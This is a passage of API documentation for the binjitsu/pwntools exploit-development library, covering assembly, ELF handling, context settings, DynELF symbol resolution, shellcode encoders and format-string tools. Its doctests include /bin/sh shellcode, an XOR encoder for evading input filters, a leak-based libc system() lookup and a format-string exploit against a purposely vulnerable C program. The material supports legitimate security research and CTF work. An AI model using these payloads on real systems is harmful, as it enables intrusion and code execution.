>>> print disasm('b85d000000'.decode('hex'), arch = 'i386') 0: b8 5d 00 00 00 mov eax,0x5d >>> print disasm('b85d000000'.decode('hex'), arch = 'i386', byte = 0) 0: mov eax,0x5d >>> print disasm('b85d000000'.decode('hex'), arch = 'i386', byte = 0, offset = 0) mov eax,0x5d >>> print disasm('b817000000'.decode('hex'), arch = 'amd64') 0: b8 17 00 00 00 mov eax,0x17 >>> print disasm('48c7c017000000'.decode('hex'), arch = 'amd64') 0: 48 c7 c0 17 00 00 00 mov rax,0x17 >>> print disasm('04001fe552009000'.decode('hex'), arch = 'arm') 0: e51f0004 ldr r0, [pc, #-4] ; 0x4 4: 00900052 addseq r0, r0, r2, asr r0 >>> print disasm('4ff00500'.decode('hex'), arch = 'thumb', bits=32) 0: f04f 0005 mov.w r0, #5 >>>
-
pwnlib.asm.
make_elf
(*a, **kw)[source]¶ Builds an ELF file with the specified binary data as its executable code.
Parameters: Examples
This example creates an i386 ELF that just does execve(‘/bin/sh’,...).
>>> context.clear() >>> context.arch = 'i386' >>> context.bits = 32 >>> filename = tempfile.mktemp() >>> bin_sh = '6a68682f2f2f73682f62696e89e331c96a0b5899cd80'.decode('hex') >>> data = make_elf(bin_sh) >>> with open(filename,'wb+') as f: ... f.write(data) ... f.flush() >>> os.chmod(filename,0777) >>> p = process(filename) >>> p.sendline('echo Hello; exit') >>> p.recvline() 'Hello\n'
-
pwnlib.asm.
make_elf_from_assembly
(*a, **kw)[source]¶ Builds an ELF file with the specified assembly as its executable code.
Parameters: Returns: The path to the assembled ELF (extract=False), or the data of the assembled ELF.
Example
>>> context.clear() >>> context.arch = 'amd64' >>> sc = 'push rbp; mov rbp, rsp;' >>> sc += shellcraft.echo('Hello\n') >>> sc += 'mov rsp, rbp; pop rbp; ret' >>> solib = make_elf_from_assembly(sc, shared=1) >>> subprocess.check_output(['echo', 'World'], env={'LD_PRELOAD': solib}) 'Hello\nWorld\n'
pwnlib.atexception
— Callbacks on unhandled exception¶
Analogous to atexit, this module allows the programmer to register functions to be run if an unhandled exception occurs.
-
pwnlib.atexception.
register
(func, *args, **kwargs)[source]¶ Registers a function to be called when an unhandled exception occurs. The function will be called with positional arguments args and keyword arguments kwargs, i.e.
func(*args, **kwargs)
. The current context is recorded and will be the one used when the handler is run.E.g. to suppress logging output from an exception-handler one could write:
with context.local(log_level = 'error'): atexception.register(handler)
An identifier is returned which can be used to unregister the exception-handler.
This function can be used as a decorator:
@atexception.register def handler(): ...
Notice however that this will bind
handler
to the identifier and not the actual exception-handler. The exception-handler can then be unregistered with:atexception.unregister(handler)
This function is thread safe.
pwnlib.atexit
— Replacement for atexit¶
Replacement for the Python standard library’s atexit.py.
Whereas the standard atexit
module only defines atexit.register()
,
this replacement module also defines unregister()
.
This module also fixes a the issue that exceptions raised by an exit handler is
printed twice when the standard atexit
is used.
-
pwnlib.atexit.
register
(func, *args, **kwargs)[source]¶ Registers a function to be called on program termination. The function will be called with positional arguments args and keyword arguments kwargs, i.e.
func(*args, **kwargs)
. The current context is recorded and will be the one used when the handler is run.E.g. to suppress logging output from an exit-handler one could write:
with context.local(log_level = 'error'): atexit.register(handler)
An identifier is returned which can be used to unregister the exit-handler.
This function can be used as a decorator:
@atexit.register def handler(): ...
Notice however that this will bind
handler
to the identifier and not the actual exit-handler. The exit-handler can then be unregistered with:atexit.unregister(handler)
This function is thread safe.
pwnlib.constants
— Easy access to header file constants¶
Module containing constants extracted from header files.
The purpose of this module is to provide quick access to constants from different architectures and operating systems.
The constants are wrapped by a convenience class that allows accessing the name of the constant, while performing all normal mathematical operations on it.
Example
>>> str(constants.freebsd.SYS_stat)
'SYS_stat'
>>> int(constants.freebsd.SYS_stat)
188
>>> hex(constants.freebsd.SYS_stat)
'0xbc'
>>> 0 | constants.linux.i386.SYS_stat
106
>>> 0 + constants.linux.amd64.SYS_stat
4
The submodule freebsd
contains all constants for FreeBSD, while the
constants for Linux have been split up by architecture.
The variables of the submodules will be “lifted up” by setting the
pwnlib.context.arch
or pwnlib.context.os
in a manner similar to
what happens in pwnlib.shellcraft
.
Example
>>> with context.local(os = 'freebsd'):
... print int(constants.SYS_stat)
188
>>> with context.local(os = 'linux', arch = 'i386'):
... print int(constants.SYS_stat)
106
>>> with context.local(os = 'linux', arch = 'amd64'):
... print int(constants.SYS_stat)
4
pwnlib.context
— Setting runtime variables¶
-
pwnlib.context.
context
= ContextType()[source]¶ Global
context
object, used to store commonly-used binjitsu settings. In most cases, the context is used to infer default variables values. For example,pwnlib.asm.asm()
can take anos
parameter as a keyword argument. If it is not supplied, theos
specified bycontext
is used instead. Consider it a shorthand to passingos=
andarch=
to every single function call.
-
class
pwnlib.context.
ContextType
(**kwargs)[source]¶ Class for specifying information about the target machine. Intended for use as a pseudo-singleton through the global variable
pwnlib.context.context
, available viafrom pwn import *
ascontext
.The context is usually specified at the top of the Python file for clarity.
#!/usr/bin/env python context.update(arch='i386', os='linux')
Currently supported properties and their defaults are listed below. The defaults are inherited from
pwnlib.context.ContextType.defaults
.Additionally, the context is thread-aware when using
pwnlib.context.Thread
instead ofthreading.Thread
(all internalbinjitsu
threads use the former).The context is also scope-aware by using the
with
keyword.Examples
>>> context.clear() >>> context.update(os='linux') >>> context.os == 'linux' True >>> context.arch = 'arm' >>> vars(context) == {'arch': 'arm', 'bits': 32, 'endian': 'little', 'os': 'linux'} True >>> context.endian 'little' >>> context.bits 32 >>> def nop(): ... print pwnlib.asm.asm('nop').encode('hex') >>> nop() 00f020e3 >>> with context.local(arch = 'i386'): ... nop() 90 >>> from pwnlib.context import Thread as PwnThread >>> from threading import Thread as NormalThread >>> with context.local(arch = 'mips'): ... pwnthread = PwnThread(target=nop) ... thread = NormalThread(target=nop) >>> # Normal thread uses the default value for arch, 'i386' >>> _=(thread.start(), thread.join()) 90 >>> # Pwnthread uses the correct context from creation-time >>> _=(pwnthread.start(), pwnthread.join()) 00000000 >>> nop() 00f020e3
-
class
Thread
(*args, **kwargs)[source]¶ Instantiates a context-aware thread, which inherit its context when it is instantiated. The class can be accessed both on the context module as pwnlib.context.Thread and on the context singleton object inside the context module as pwnlib.context.context.Thread.
Threads created by using the native :class`threading`.Thread` will have a clean (default) context.
Regardless of the mechanism used to create any thread, the context is de-coupled from the parent thread, so changes do not cascade to child or parent.
Saves a copy of the context when instantiated (at
__init__
) and updates the new thread’s context before passing control to the user code viarun
ortarget=
.Examples
>>> context.clear() >>> context.update(arch='arm') >>> def p(): ... print context.arch ... context.arch = 'mips' ... print context.arch >>> # Note that a normal Thread starts with a clean context >>> # (i386 is the default architecture) >>> t = threading.Thread(target=p) >>> _=(t.start(), t.join()) i386 mips >>> # Note that the main Thread's context is unchanged >>> print context.arch arm >>> # Note that a context-aware Thread receives a copy of the context >>> t = pwnlib.context.Thread(target=p) >>> _=(t.start(), t.join()) arm mips >>> # Again, the main thread is unchanged >>> print context.arch arm
Implementation Details:
This class implemented by hooking the private function
threading.Thread._Thread_bootstrap()
, which is called before passing control tothreading.Thread.run()
.This could be done by overriding
run
itself, but we would have to ensure that all uses of the class would only ever use the keywordtarget=
for__init__
, or that all subclasses invokesuper(Subclass.self).set_up_context()
or similar.
-
ContextType.
adb_host
[source]¶ Sets the target host which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_HOST, or set to the default ‘localhost’.
-
ContextType.
adb_port
[source]¶ Sets the target port which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_PORT, or set to the default 5037.
-
ContextType.
arch
[source]¶ Target binary architecture.
Allowed values are listed in
pwnlib.context.ContextType.architectures
.Side Effects:
If an architecture is specified which also implies additional attributes (e.g. ‘amd64’ implies 64-bit words, ‘powerpc’ implies big-endian), these attributes will be set on the context if a user has not already set a value.
The following properties may be modified.
bits
endian
Raises: AttributeError
– An invalid architecture was specifiedExamples
>>> context.clear() >>> context.arch == 'i386' # Default architecture True
>>> context.arch = 'mips' >>> context.arch == 'mips' True
>>> context.arch = 'doge' Traceback (most recent call last): ... AttributeError: arch must be one of ['aarch64', ..., 'thumb']
>>> context.arch = 'ppc' >>> context.arch == 'powerpc' # Aliased architecture True
>>> context.clear() >>> context.bits == 32 # Default value True >>> context.arch = 'amd64' >>> context.bits == 64 # New value True
Note that expressly setting
bits
means that we use that value instead of the default>>> context.clear() >>> context.bits = 32 >>> context.arch = 'amd64' >>> context.bits == 32 True
Setting the architecture can override the defaults for both
endian
andbits
>>> context.clear() >>> context.arch = 'powerpc64' >>> vars(context) == {'arch': 'powerpc64', 'bits': 64, 'endian': 'big'} True
-
ContextType.
architectures
= OrderedDict([('powerpc64', {'bits': 64, 'endian': 'big'}), ('aarch64', {'bits': 64, 'endian': 'little'}), ('sparc64', {'bits': 64, 'endian': 'big'}), ('powerpc', {'bits': 32, 'endian': 'big'}), ('mips64', {'bits': 64, 'endian': 'little'}), ('msp430', {'bits': 16, 'endian': 'little'}), ('thumb', {'bits': 32, 'endian': 'little'}), ('amd64', {'bits': 64, 'endian': 'little'}), ('sparc', {'bits': 32, 'endian': 'big'}), ('alpha', {'bits': 64, 'endian': 'little'}), ('s390', {'bits': 32, 'endian': 'big'}), ('i386', {'bits': 32, 'endian': 'little'}), ('m68k', {'bits': 32, 'endian': 'big'}), ('mips', {'bits': 32, 'endian': 'little'}), ('ia64', {'bits': 64, 'endian': 'big'}), ('cris', {'bits': 32, 'endian': 'little'}), ('vax', {'bits': 32, 'endian': 'little'}), ('avr', {'bits': 8, 'endian': 'little'}), ('arm', {'bits': 32, 'endian': 'little'})])[source]¶ Keys are valid values for
pwnlib.context.ContextType.arch()
. Values are defaults which are set whenpwnlib.context.ContextType.arch
is set
-
ContextType.
aslr
[source]¶ ASLR settings for new processes.
If
False
, attempt to disable ASLR in all processes which are created viapersonality
(setarch -R
) andsetrlimit
(ulimit -s unlimited
).The
setarch
changes are lost if asetuid
binary is executed.
-
ContextType.
binary
[source]¶ Infer target architecture, bit-with, and endianness from a binary file. Data type is a
pwnlib.elf.ELF
object.Examples
>>> context.clear() >>> context.arch, context.bits ('i386', 32) >>> context.binary = '/bin/bash' >>> context.arch, context.bits ('amd64', 64) >>> context.binary ELF('/bin/bash')
-
ContextType.
bits
[source]¶ Target machine word size, in bits (i.e. the size of general purpose registers).
The default value is
32
, but changes according toarch
.Examples
>>> context.clear() >>> context.bits == 32 True >>> context.bits = 64 >>> context.bits == 64 True >>> context.bits = -1 Traceback (most recent call last): ... AttributeError: bits must be > 0 (-1)
-
ContextType.
bytes
[source]¶ Target machine word size, in bytes (i.e. the size of general purpose registers).
This is a convenience wrapper around
bits / 8
.Examples
>>> context.bytes = 1 >>> context.bits == 8 True
>>> context.bytes = 0 Traceback (most recent call last): ... AttributeError: bits must be > 0 (0)
-
ContextType.
clear
(*a, **kw)[source]¶ Clears the contents of the context. All values are set to their defaults.
Parameters: - a – Arguments passed to
update
- kw – Arguments passed to
update
Examples
>>> # Default value >>> context.arch == 'i386' True >>> context.arch = 'arm' >>> context.arch == 'i386' False >>> context.clear() >>> context.arch == 'i386' True
- a – Arguments passed to
-
ContextType.
copy
() → dict[source]¶ Returns a copy of the current context as a dictionary.
Examples
>>> context.clear() >>> context.os = 'linux' >>> vars(context) == {'os': 'linux'} True
-
ContextType.
defaults
= {'binary': None, 'aslr': True, 'log_file': <pwnlib.context._devnull object at 0x7faa3ff1f6d0>, 'log_level': 20, 'os': 'linux', 'kernel': None, 'bits': 32, 'noptrace': False, 'newline': '\n', 'terminal': None, 'randomize': False, 'adb_host': 'localhost', 'signed': False, 'proxy': None, 'timeout': pwnlib.timeout.maximum, 'endian': 'little', 'device': None, 'adb_port': 5037, 'arch': 'i386'}[source]¶ Default values for
pwnlib.context.ContextType
-
ContextType.
endian
[source]¶ Endianness of the target machine.
The default value is
'little'
, but changes according toarch
.Raises: AttributeError
– An invalid endianness was providedExamples
>>> context.clear() >>> context.endian == 'little' True
>>> context.endian = 'big' >>> context.endian 'big'
>>> context.endian = 'be' >>> context.endian == 'big' True
>>> context.endian = 'foobar' Traceback (most recent call last): ... AttributeError: endian must be one of ['be', 'big', 'eb', 'el', 'le', 'little']
-
ContextType.
endianness
[source]¶ Legacy alias for
endian
.Examples
>>> context.endian == context.endianness True
-
ContextType.
endiannesses
= OrderedDict([('little', 'little'), ('big', 'big'), ('el', 'little'), ('le', 'little'), ('be', 'big'), ('eb', 'big')])[source]¶ Valid values for
endian
-
ContextType.
kernel
[source]¶ Target machine’s kernel architecture.
Usually, this is the same as
arch
, except when running a 32-bit binary on a 64-bit kernel (e.g. i386-on-amd64).Even then, this doesn’t matter much – only when the the segment registers need to be known
-
ContextType.
local
(**kwargs) → context manager[source]¶ Create a context manager for use with the
with
statement.For more information, see the example below or PEP 343.
Parameters: kwargs – Variables to be assigned in the new environment. Returns: ContextType manager for managing the old and new environment. Examples
>>> context.clear() >>> context.timeout = 1 >>> context.timeout == 1 True >>> print context.timeout 1.0 >>> with context.local(timeout = 2): ... print context.timeout ... context.timeout = 3 ... print context.timeout 2.0 3.0 >>> print context.timeout 1.0
-
ContextType.
log_file
[source]¶ Sets the target file for all logging output.
Works in a similar fashion to
log_level
.Examples
>>> context.log_file = 'foo.txt' >>> log.debug('Hello!') >>> with context.local(log_level='ERROR'): ... log.info('Hello again!') >>> with context.local(log_file='bar.txt'): ... log.debug('Hello from bar!') >>> log.info('Hello from foo!') >>> file('foo.txt').readlines()[-3] '...:DEBUG:...:Hello!\n' >>> file('foo.txt').readlines()[-2] '...:INFO:...:Hello again!\n' >>> file('foo.txt').readlines()[-1] '...:INFO:...:Hello from foo!\n' >>> file('bar.txt').readlines()[-1] '...:DEBUG:...:Hello from bar!\n'
-
ContextType.
log_level
[source]¶ Sets the verbosity of
binjitsu
logging mechanism.More specifically it controls the filtering of messages that happens inside the handler for logging to the screen. So if you want e.g. log all messages to a file, then this attribute makes no difference to you.
Valid values are specified by the standard Python
logging
module.Default value is set to
INFO
.Examples
>>> context.log_level = 'error' >>> context.log_level == logging.ERROR True >>> context.log_level = 10 >>> context.log_level = 'foobar' Traceback (most recent call last): ... AttributeError: log_level must be an integer or one of ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
-
ContextType.
noptrace
[source]¶ Disable all actions which rely on ptrace.
This is useful for switching between local exploitation with a debugger, and remote exploitation (without a debugger).
This option can be set with the
NOPTRACE
command-line argument.
-
ContextType.
os
[source]¶ Operating system of the target machine.
The default value is
linux
.Allowed values are listed in
pwnlib.context.ContextType.oses
.Examples
>>> context.os = 'linux' >>> context.os = 'foobar' Traceback (most recent call last): ... AttributeError: os must be one of ['android', 'cgc', 'freebsd', 'linux', 'windows']
-
ContextType.
oses
= ['android', 'cgc', 'freebsd', 'linux', 'windows'][source]¶ Valid values for
pwnlib.context.ContextType.os()
-
ContextType.
proxy
[source]¶ Default proxy for all socket connections.
Accepts either a string (hostname or IP address) for a SOCKS5 proxy on the default port, or a
tuple
passed tosocks.set_default_proxy
, e.g.(socks.SOCKS4, 'localhost', 1234)
.>>> context.proxy = 'localhost' >>> r=remote('google.com', 80) Traceback (most recent call last): ... ProxyConnectionError: Error connecting to SOCKS5 proxy localhost:1080: [Errno 111] Connection refused
>>> context.proxy = None >>> r=remote('google.com', 80, level='error')
-
ContextType.
quiet
[source]¶ Disables all non-error logging within the enclosed scope, unless the debugging level is set to ‘debug’ or lower.
-
ContextType.
signed
[source]¶ Signed-ness for packing operation when it’s not explicitly set.
Can be set to any non-string truthy value, or the specific string values
'signed'
or'unsigned'
which are converted intoTrue
andFalse
correspondingly.Examples
>>> context.signed False >>> context.signed = 1 >>> context.signed True >>> context.signed = 'signed' >>> context.signed True >>> context.signed = 'unsigned' >>> context.signed False >>> context.signed = 'foobar' Traceback (most recent call last): ... AttributeError: signed must be one of ['no', 'signed', 'unsigned', 'yes'] or a non-string truthy value
-
ContextType.
signednesses
= {'yes': True, 'unsigned': False, 'signed': True, 'no': False}[source]¶ Valid string values for
signed
-
ContextType.
terminal
[source]¶ Default terminal used by
pwnlib.util.misc.run_in_new_terminal()
. Can be a string or an iterable of strings. In the latter case the first entry is the terminal and the rest are default arguments.
-
ContextType.
timeout
[source]¶ Default amount of time to wait for a blocking operation before it times out, specified in seconds.
The default value is to have an infinite timeout.
See
pwnlib.timeout.Timeout
for additional information on valid values.
-
ContextType.
update
(*args, **kwargs)[source]¶ Convenience function, which is shorthand for setting multiple variables at once.
It is a simple shorthand such that:
context.update(os = 'linux', arch = 'arm', ...)
is equivalent to:
context.os = 'linux' context.arch = 'arm' ...
The following syntax is also valid:
context.update({'os': 'linux', 'arch': 'arm'})
Parameters: kwargs – Variables to be assigned in the environment. Examples
>>> context.clear() >>> context.update(arch = 'i386', os = 'linux') >>> context.arch, context.os ('i386', 'linux')
-
class
-
class
pwnlib.context.
Thread
(*args, **kwargs)[source]¶ Instantiates a context-aware thread, which inherit its context when it is instantiated. The class can be accessed both on the context module as pwnlib.context.Thread and on the context singleton object inside the context module as pwnlib.context.context.Thread.
Threads created by using the native :class`threading`.Thread` will have a clean (default) context.
Regardless of the mechanism used to create any thread, the context is de-coupled from the parent thread, so changes do not cascade to child or parent.
Saves a copy of the context when instantiated (at
__init__
) and updates the new thread’s context before passing control to the user code viarun
ortarget=
.Examples
>>> context.clear() >>> context.update(arch='arm') >>> def p(): ... print context.arch ... context.arch = 'mips' ... print context.arch >>> # Note that a normal Thread starts with a clean context >>> # (i386 is the default architecture) >>> t = threading.Thread(target=p) >>> _=(t.start(), t.join()) i386 mips >>> # Note that the main Thread's context is unchanged >>> print context.arch arm >>> # Note that a context-aware Thread receives a copy of the context >>> t = pwnlib.context.Thread(target=p) >>> _=(t.start(), t.join()) arm mips >>> # Again, the main thread is unchanged >>> print context.arch arm
Implementation Details:
This class implemented by hooking the private function
threading.Thread._Thread_bootstrap()
, which is called before passing control tothreading.Thread.run()
.This could be done by overriding
run
itself, but we would have to ensure that all uses of the class would only ever use the keywordtarget=
for__init__
, or that all subclasses invokesuper(Subclass.self).set_up_context()
or similar.
pwnlib.dynelf
— Resolving remote functions using leaks¶
Resolve symbols in loaded, dynamically-linked ELF binaries. Given a function which can leak data at an arbitrary address, any symbol in any loaded library can be resolved.
Examples
# Assume a process or remote connection
p = process('./pwnme')
# Declare a function that takes a single address, and
# leaks at least one byte at that address.
def leak(address):
data = p.read(address, 4)
log.debug("%#x => %s" % (address, (data or '').encode('hex')))
return data
# For the sake of this example, let's say that we
# have any of these pointers. One is a pointer into
# the target binary, the other two are pointers into libc
main = 0xfeedf4ce
libc = 0xdeadb000
system = 0xdeadbeef
# With our leaker, and a pointer into our target binary,
# we can resolve the address of anything.
#
# We do not actually need to have a copy of the target
# binary for this to work.
d = DynELF(leak, main)
assert d.lookup(None, 'libc') == libc
assert d.lookup('system', 'libc') == system
# However, if we *do* have a copy of the target binary,
# we can speed up some of the steps.
d = DynELF(leak, main, elf=ELF('./pwnme'))
assert d.lookup(None, 'libc') == libc
assert d.lookup('system', 'libc') == system
# Alternately, we can resolve symbols inside another library,
# given a pointer into it.
d = DynELF(leak, libc + 0x1234)
assert d.lookup('system') == system
Here’s another example which actually serves as a doctest. First, let’s assume that we have a pointer somewhere into the main executable.
>>> maps = read('/proc/self/maps').splitlines()
>>> map = (line for line in maps if '/python' in line).next()
>>> addr = map.split('-')[0]
>>> addr = int(addr, 16)
Normally we don’t get the base address, but some random offset into the binary.
>>> addr += 0xdead
Next, let’s describe a leak function which can return memory from the target address space.
>>> @MemLeak
... def leak(addr):
... with open('/proc/self/mem', 'rb') as mem:
... mem.seek(addr)
... try:
... return mem.read(32)
... except:
... pass
Now we can find arbitrary functions, in arbitrary modules.
>>> de = DynELF(leak, addr)
>>> system = de.lookup('system', 'libc')
Let’s try out our function pointer! Normally we would have register or stack control to do this, but we can do it properly with ctypes.
>>> import ctypes
>>> system_functype = ctypes.CFUNCTYPE(None, ctypes.c_char_p)
>>> system_functype(system)("echo hello > hello.dynelf")
>>> read('hello.dynelf')
'hello\n'
DynELF
-
class
pwnlib.dynelf.
DynELF
(leak, pointer=None, elf=None)[source]¶ DynELF knows how to resolve symbols in remote processes via an infoleak or memleak vulnerability encapsulated by
pwnlib.memleak.MemLeak
.Implementation Details:
Resolving Functions:
In all ELFs which export symbols for importing by other libraries, (e.g.
libc.so
) there are a series of tables which give exported symbol names, exported symbol addresses, and thehash
of those exported symbols. By applying a hash function to the name of the desired symbol (e.g.,'printf'
), it can be located in the hash table. Its location in the hash table provides an index into the string name table (strtab), and the symbol address (symtab).Assuming we have the base address of
libc.so
, the way to resolve the address ofprintf
is to locate thesymtab
,strtab
, and hash table. The string"printf"
is hashed according to the style of the hash table (SYSV or GNU), and the hash table is walked until a matching entry is located. We can verify an exact match by checking the string table, and then get the offset intolibc.so
from thesymtab
.Resolving Library Addresses:
If we have a pointer into a dynamically-linked executable, we can leverage an internal linker structure called the link map. This is a linked list structure which contains information about each loaded library, including its full path and base address.
A pointer to the
link map
can be found in two ways. Both are referenced from entries in the DYNAMIC array.- In non-RELRO binaries, a pointer is placed in the .got.plt area in the binary. This is marked by finding the DT_PLTGOT area in the binary.
- In all binaries, a pointer can be found in the area described by the DT_DEBUG area. This exists even in stripped binaries.
For maximum flexibility, both mechanisms are used exhaustively.
-
bases
()[source]¶ Resolve base addresses of all loaded libraries.
Return a dictionary mapping library path to its base address.
-
static
find_base
(leak, ptr)[source]¶ Given a
pwnlib.memleak.MemLeak
object and a pointer into a library, find its base address.
-
heap
()[source]¶ Finds the beginning of the heap via __curbrk, which is an exported symbol in the linker, which points to the current brk.
-
libc
[source]¶ Leak the Build ID of the remote libc.so, download the file, and load an
ELF
object with the correct base address.Returns: An ELF object, or None.
pwnlib.encoders
— Encoding Shellcode¶
Encode shellcode to avoid input filtering and impress your friends!
-
pwnlib.encoders.encoder.
alphanumeric
(raw_bytes) → str[source]¶ Encode the shellcode
raw_bytes
such that it does not contain any bytes except for [A-Za-z0-9].Accepts the same arguments as
encode()
.
-
pwnlib.encoders.encoder.
encode
(raw_bytes, avoid, expr, force) → str[source]¶ Encode shellcode
raw_bytes
such that it does not contain any bytes inavoid
orexpr
.Parameters:
-
pwnlib.encoders.encoder.
line
(raw_bytes) → str[source]¶ Encode the shellcode
raw_bytes
such that it does not contain any NULL bytes or whitespace.Accepts the same arguments as
encode()
.
-
pwnlib.encoders.encoder.
null
(raw_bytes) → str[source]¶ Encode the shellcode
raw_bytes
such that it does not contain any NULL bytes.Accepts the same arguments as
encode()
.
-
pwnlib.encoders.encoder.
printable
(raw_bytes) → str[source]¶ Encode the shellcode
raw_bytes
such that it only contains non-space printable bytes.Accepts the same arguments as
encode()
.
-
pwnlib.encoders.encoder.
scramble
(raw_bytes) → str[source]¶ Encodes the input data with a random encoder.
Accepts the same arguments as
encode()
.
-
class
pwnlib.encoders.i386.xor.
i386XorEncoder
[source]¶ Generates an XOR decoder for i386.
>>> context.clear(arch='i386') >>> shellcode = asm(shellcraft.sh()) >>> avoid = '/bin/sh\xcc\xcd\x80' >>> encoded = pwnlib.encoders.i386.xor.encode(shellcode, avoid) >>> assert not any(c in encoded for c in avoid) >>> p = run_shellcode(encoded) >>> p.sendline('echo hello; exit') >>> p.recvline() 'hello\n'
pwnlib.elf
— Working with ELF binaries¶
-
class
pwnlib.elf.
ELF
(path)[source]¶ Encapsulates information about an ELF file.
Variables: - path – Path to the binary on disk
- symbols – Dictionary of {name: address} for all symbols in the ELF
- plt – Dictionary of {name: address} for all functions in the PLT
- got – Dictionary of {name: address} for all function pointers in the GOT
- libs – Dictionary of {path: address} for each shared object required to load the ELF
Example
bash = ELF(which('bash')) hex(bash.symbols['read']) # 0x41dac0 hex(bash.plt['read']) # 0x41dac0 u32(bash.read(bash.got['read'], 4)) # 0x41dac6 print disasm(bash.read(bash.plt['read'],16), arch='amd64') # 0: ff 25 1a 18 2d 00 jmp QWORD PTR [rip+0x2d181a] # 0x2d1820 # 6: 68 59 00 00 00 push 0x59 # b: e9 50 fa ff ff jmp 0xfffffffffffffa60
-
address
[source]¶ Address of the lowest segment loaded in the ELF. When updated, cascades updates to segment vaddrs, section addrs, symbols, plt, and got.
>>> bash = ELF(which('bash')) >>> old = bash.symbols['read'] >>> bash.address += 0x1000 >>> bash.symbols['read'] == old + 0x1000 True
-
asm
(address, assembly)[source]¶ Assembles the specified instructions and inserts them into the ELF at the specified address.
The resulting binary can be saved with ELF.save()
-
disasm
(address, n_bytes)[source]¶ Returns a string of disassembled instructions at the specified virtual memory address
-
static
from_assembly
(*a, **kw)[source]¶ Given an assembly listing, return a fully loaded ELF object which contains that assembly at its entry point.
Parameters: Example
>>> e = ELF.from_assembly('nop; foo: int 0x80', vma = 0x400000) >>> e.symbols['foo'] = 0x400001 >>> e.disasm(e.entry, 1) ' 400000: 90 nop' >>> e.disasm(e.symbols['foo'], 2) ' 400001: cd 80 int 0x80'
-
static
from_bytes
(*a, **kw)[source]¶ Given a sequence of bytes, return a fully loaded ELF object which contains those bytes at its entry point.
Parameters: Example
>>> e = ELF.from_bytes('\x90\xcd\x80', vma=0xc000) >>> print(e.disasm(e.entry, 3)) c000: 90 nop c001: cd 80 int 0x80
-
get_data
()[source]¶ Retrieve the raw data from the ELF file.
>>> bash = ELF(which('bash')) >>> fd = open(which('bash')) >>> bash.get_data() == fd.read() True
-
libc
[source]¶ If the ELF imports any libraries which contain ‘libc.so’, and we can determine the appropriate path to it on the local system, returns an ELF object pertaining to that libc.so.
Otherwise, returns
None
.
-
offset_to_vaddr
(offset)[source]¶ Translates the specified offset to a virtual address.
Parameters: offset (int) – Offset to translate Returns: Virtual address which corresponds to the file offset, or None Examples
>>> bash = ELF(which('bash')) >>> bash.address == bash.offset_to_vaddr(0) True >>> bash.address += 0x123456 >>> bash.address == bash.offset_to_vaddr(0) True
-
read
(address, count)[source]¶ Read data from the specified virtual address
Parameters: Returns: A string of bytes, or None
Examples
>>> bash = ELF(which('bash')) >>> bash.read(bash.address+1, 3) 'ELF'
-
save
(path)[source]¶ Save the ELF to a file
>>> bash = ELF(which('bash')) >>> bash.save('/tmp/bash_copy') >>> copy = file('/tmp/bash_copy') >>> bash = file(which('bash')) >>> bash.read() == copy.read() True
-
search
(needle, writable = False) → str generator[source]¶ Search the ELF’s virtual address space for the specified string.
Parameters: Returns: An iterator for each virtual address that matches.
Examples
>>> bash = ELF(which('bash')) >>> bash.address + 1 == next(bash.search('ELF')) True
>>> sh = ELF(which('bash')) >>> # /bin/sh should only depend on libc >>> libc_path = [key for key in sh.libs.keys() if 'libc' in key][0] >>> libc = ELF(libc_path) >>> # this string should be in there because of system(3) >>> len(list(libc.search('/bin/sh'))) > 0 True
-
section
(name)[source]¶ Gets data for the named section
Parameters: name (str) – Name of the section Returns: String containing the bytes for that section
-
vaddr_to_offset
(address)[source]¶ Translates the specified virtual address to a file address
Parameters: address (int) – Virtual address to translate Returns: Offset within the ELF file which corresponds to the address, or None. Examples
>>> bash = ELF(which('bash')) >>> 0 == bash.vaddr_to_offset(bash.address) True >>> bash.address += 0x123456 >>> 0 == bash.vaddr_to_offset(bash.address) True
-
write
(address, data)[source]¶ Writes data to the specified virtual address
Parameters: - Note::
- This routine does not check the bounds on the write to ensure that it stays in the same segment.
Examples
>>> bash = ELF(which('bash')) >>> bash.read(bash.address+1, 3) 'ELF' >>> bash.write(bash.address, "HELO") >>> bash.read(bash.address, 4) 'HELO'
-
class
pwnlib.elf.
Core
(*a, **kw) → Core[source]¶ Enhances the inforation available about a corefile (which is an extension of the ELF format) by permitting extraction of information about the mapped data segments, and register state.
Registers can be accessed directly, e.g. via
core_obj.eax
.Mappings can be iterated in order via
core_obj.mappings
.
pwnlib.exception
— Pwnlib exceptions¶
pwnlib.fmtstr
— Format string bug exploitation tools¶
Provide some tools to exploit format string bug
Examples
>>> program = tempfile.mktemp()
>>> source = program + ".c"
>>> write(source, '''
... #include <stdio.h>
... #include <stdlib.h>
... #include <unistd.h>
... #include <sys/mman.h>
... #define MEMORY_ADDRESS ((void*)0x11111000)
... #define MEMORY_SIZE 1024
... #define TARGET ((int *) 0x11111110)
... int main(int argc, char const *argv[])
... {
... char buff[1024];
... void *ptr = NULL;
... int *my_var = TARGET;
... ptr = mmap(MEMORY_ADDRESS, MEMORY_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
... if(ptr != MEMORY_ADDRESS)
... {
... perror("mmap");
... return EXIT_FAILURE;
... }
... *my_var = 0x41414141;
... write(1, &my_var, sizeof(int *));
... scanf("%s", buff);
... dprintf(2, buff);
... write(1, my_var, sizeof(int));
... return 0;
... }''')
>>> cmdline = ["gcc", source, "-Wno-format-security", "-m32", "-o", program]
>>> process(cmdline).wait_for_close()
>>> def exec_fmt(payload):
... p = process(program)
... p.sendline(payload)
... return p.recvall()
...
>>> autofmt = FmtStr(exec_fmt)
>>> offset = autofmt.offset
>>> p = process(program, stderr=subprocess.PIPE)
>>> addr = unpack(p.recv(4))
>>> payload = fmtstr_payload(offset, {addr: 0x1337babe})
>>> p.sendline(payload)
>>> print hex(unpack(p.recv(4)))
0x1337babe
Example - Payload generation¶
# we want to do 3 writes
writes = {0x08041337: 0xbfffffff,
0x08041337+4: 0x1337babe,
0x08041337+8: 0xdeadbeef}
# the printf() call already writes some bytes
# for example :
# strcat(dest, "blabla :", 256);
# strcat(dest, your_input, 256);
# printf(dest);
# Here, numbwritten parameter must be 8
payload = fmtstr_payload(5, writes, numbwritten=8)
Example - Automated exploitation¶
# Assume a process that reads a string
# and gives this string as the first argument
# of a printf() call
# It do this indefinitely
p = process('./vulnerable')
# Function called in order to send a payload
